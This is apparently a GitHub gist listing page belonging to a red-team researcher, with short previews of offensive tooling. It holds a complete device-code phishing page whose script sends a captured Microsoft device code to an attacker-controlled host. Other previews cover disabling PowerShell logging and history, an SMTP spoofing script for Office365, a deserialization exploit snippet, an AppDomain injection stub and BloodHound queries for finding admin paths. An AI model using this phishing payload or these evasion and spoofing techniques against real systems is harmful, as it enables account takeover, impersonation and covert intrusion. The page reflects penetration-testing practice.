Skip to content

Instantly share code, notes, and snippets.

View rvrsh3ll's full-sized avatar

Steve Borosh rvrsh3ll

1.4k followers · 13 following
View GitHub Profile
@rvrsh3ll
rvrsh3ll / krack_zine.txt
Created October 31, 2022 12:07
KK KK RRRRRRR AAA CCCCCCCCCC KK KK
KK KK RR R AA AA CC KK KK
KKKKKKK RRRRRRR AA AA CC KKKKKKK
KK KK RR RR AAAAAAAAA CC KK KK
KK KK RR RR AA AA CC KK KK
KK KK OO RR RR OO AA AA OO CCCCCCCCCCC OO KK KK OO

||==--Killer Ride And Chilling Kraftwork--==||
--------------------------------------------------------------------------
@rvrsh3ll
rvrsh3ll / Export_All_Yammer_Users.ps1
Created October 24, 2022 20:23 — forked from Benoit-Gaumard/Export_All_Yammer_Users.ps1
Export all Yammer users through the Yammer REST API with PowerShell
##############################################################################
# Export all Yammer users through the Yammer REST API with PowerShell
###############################################################################
# Variables
$baererToken = "YourBaererToken"
$yammerBaseUrl = "https://www.yammer.com/api/v1"
# Function Get-BaererToken
Function Get-BaererToken()
@rvrsh3ll
rvrsh3ll / PowerShellNTFSStaticFileServer.ps1
Created October 22, 2022 03:20 — forked from Tiberriver256/PowerShellNTFSStaticFileServer.ps1
This script starts a small web server listening on localhost:8080 that will impersonate the authenticated user and serve static content. This means if they do not have NTFS permissions to the file they will get an access denied or a 404 file not found if they do not have NTFS access to list contents of the directory.
function Get-DirectoryContent {
<#
.SYNOPSIS
Function to get directory content
.EXAMPLE
Get-DirectoryContent -Path "C:\" -HeaderName "poshserver.net" -RequestURL "http://poshserver.net" -SubfolderName "/"
@rvrsh3ll
rvrsh3ll / gist:2139f0ae7869f268dec4c6007d434185
Created October 10, 2022 06:39 — forked from ThunderGunExpress/gist:d221b316c94c4b7403f3179292c23ccb
//All credit goes to Ysoserial.net and the great @tiraniddo
//Snippets copied from ysoserial.net
//https://thewover.github.io/Mixed-Assemblies/ - Great read!
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;
@rvrsh3ll
rvrsh3ll / info.txt
Created October 5, 2022 18:09 — forked from hook-s3c/info.txt
Disable Powershell logging
Logs are held by default in the user profile:
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
this directory also hosts per-application logs
--------------------------------------------------------------
Disable Logging...
remove-module psreadline
@rvrsh3ll
rvrsh3ll / spoof.py
Created October 3, 2022 20:33 — forked from ustayready/spoof.py
Simple unfinished SMTP spoof script for use with Office365 DirectSend SmartHosts
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import ssl
import email
import argparse
@rvrsh3ll
rvrsh3ll / S3UpDown.ps1
Created August 21, 2022 15:23 — forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
# Upload
&{
$ErrorActionPreference = 'Stop'
$AWSRegion = "us-east-1"
$AWSAccessKeyId = "TODO: Access Key"
$AWSSecretAccessKey = "TODO: Secret Access Key"
$BucketName = "TODO: Bucket Name"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
$OpenFileDialog.ShowDialog() | Out-Null
@rvrsh3ll
rvrsh3ll / generate.html
Created August 1, 2022 01:03 — forked from Mr-Un1k0d3r/generate.html
office device code phishing
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.device_code);
document.write(data.message);
});
</script>
@rvrsh3ll
rvrsh3ll / FindingComputersWithLocalAdmin.md
Created June 29, 2022 15:59 — forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

@rvrsh3ll
rvrsh3ll / fxstmp.cs
Created June 1, 2022 19:46
FXSTMP AppDomain Injection. - FXSTHIS!
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{